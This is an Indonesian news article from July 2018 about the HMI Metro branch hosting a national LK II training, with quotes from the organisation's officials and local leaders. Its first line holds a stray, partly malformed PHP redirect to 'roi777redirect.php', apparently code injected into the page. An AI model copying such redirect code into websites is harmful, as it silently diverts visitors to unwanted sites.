header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); HMI Cabang Metro Gelar LK II Tingkat Nasional -
HMI Cabang Metro Gelar LK II Tingkat Nasional

TRANSLAMPUNG.COM, METRO – Kota Metro menjadi tuan rumah Intermediate Training (LK II) HMI tingkat nasional. Bertemakan Revitalisasi Arah Juang HMI Dalam Menjawab Problematika Keumatan dan Kebangsaan. LK II ini digelar di Gedung Wisma Haji Al-Khairiyah dijadwalkan selama satu Minggu mulai hari Rabu (4/7/2018) hingga selesai.

Acara LK II ini dihadiri oleh, Ketua Umum PB HMI diwakili Sekjend PB HMI, Walikota Metro, Wakil Walikota Metro, Kapolres Metro, Ketua Kahmi Kota Metro Dr. Hi. Wahdi Sirajudin,Sekda Kota Metro, Komisioner KPU Metro dan Lampung Tengah, Panwaslu Kota Metro dan para tamu undangan lainya.

Dalam sambutanya, Sekertaris Jendral Pengurus Besar Himpunan Mahasiswa Islam (Sekjen PB HMI) Arya Kharisma Hardy, di hadapan para peserta dan tamu undangan, mengatakan kader HMI harus menjadi kader yang bisa mengikuti perkembangan zaman dan ilmu pengetahuan.

“Kader HMI harus melihat perubahan zaman, harus menjadi kader yang mampu membaca satu tahun ke depan hingga lima tahun ke depan,” kata Sekjend PB HMI Arya Kharisma Hardy, yang juga alumni UM Metro itu.

Menurut dia, ada satu momen besar yang sedang dihadapi bersama. “Bahwa revolusi jilid 4.0 sudah kita rasakan, ini bisa menjadi ancaman dan manfaat. Berbagai konflik sudah dirasakan pendahulu. Doktrin HMI adalah kita belajar bisa menjadi partner yang baik dan kita juga menjadi lawan yang baik dalam berdiskusi,” tukasnya.

Dia mengajak para kader yang mengikuti LK II ini untuk bersama mengupgrade diri untuk menyongsong masa depan yang lebih baik. Dia juga menyinggung soal radikalisme di Indonesia.

“Bahwa apa yang dimaksud secara lahiriah terkait radikalisme, apapun itu yang sifatnya negatif. Sudah ada kerugian terkait kencangnya arus radikalisme. Ketika umat muslim di Indonesia ini radikal semua. Maka dia bukan rahmatan lil alamin,” ujarnya.

Dia juga meminta maaf kepada audiens dikarenakan ketua umum tidak bisa menghadiri pembukaan LK II itu.

Riki Sanjaya Alam, selaku Ketua HMI Cabang Metro berharap acara selama satu minggu ke depan bisa berjalan dengan baik. “Saya juga berharap Kota Metro semakin dilihat oleh orang dari luar, sehingga banyak yang berkunjung di Kota Metro. Dan mendukung program pariwisata di Lampung,” kata dia.

Dia mengatakan, setelah LK II ini memiliki harapan kepada kader agar memiliki jiwa militansi yang lebih tinggi. “Dan ini menjadi langkah awal kita dimana melihat arah juang HMI ke depan agar menciptakan kader yang mempunyai militansi dalam menjawab problematika keumatan dan kebangsaan,” kata Riki Sanjaya Alam selaku ketua HMI cabang Metro.

Dr. Wahdi Siradjudin selaku Ketua Kahmi Kota Metro mengucapkan selamat datang kepada para peserta dari cabang HMI se nusantara, menurutnya dalam mencari ilmu pengetahuan dibutuhkan tekad yang kuat.

“Selamat datang kader HMI dari cabang se Nusantara. Jangan pernah berhenti untuk menjadi kader pembaharu bangsa. Dibutuhkan tekad yang kuat untuk tetap bisa mengikuti perkembangan zaman,” kata Wahdi Siradjudin.

Walikota Metro, Hi. Achmad Pairin mengatakan mendukung program HMI cabang Metro, dan pemerintah siap menjadi mitra HMI Kota Metro untuk mencapai pembangunan di Kota Metro.

Ketua Pelaksana Hefki Aburizal mengatakan selamat datang para peserta di Kota Metro. Dalam sambutanya dia melaporkan bahwa, ada total sebanyak 56 peserta dari total 24 cabang se Indonesia. “Dari 24 cabang tersebut ada yang mengutus 1 hingga 5 orang,” tukasnya.

Acara dimulai hari Rabu (4/7/2018) pada pukul 20.00 WIB dan rencananya Intermediate Training (LK II) ini akan dilakukan selama 1 Minggu dengan pemateri terjadwal dari senior KAHMI yang merupakan tokoh nasional antara lain, Akbar Tanjung, Azis Syamsudin, Edward Syahpernong dan lainya. (suf)

News Reporter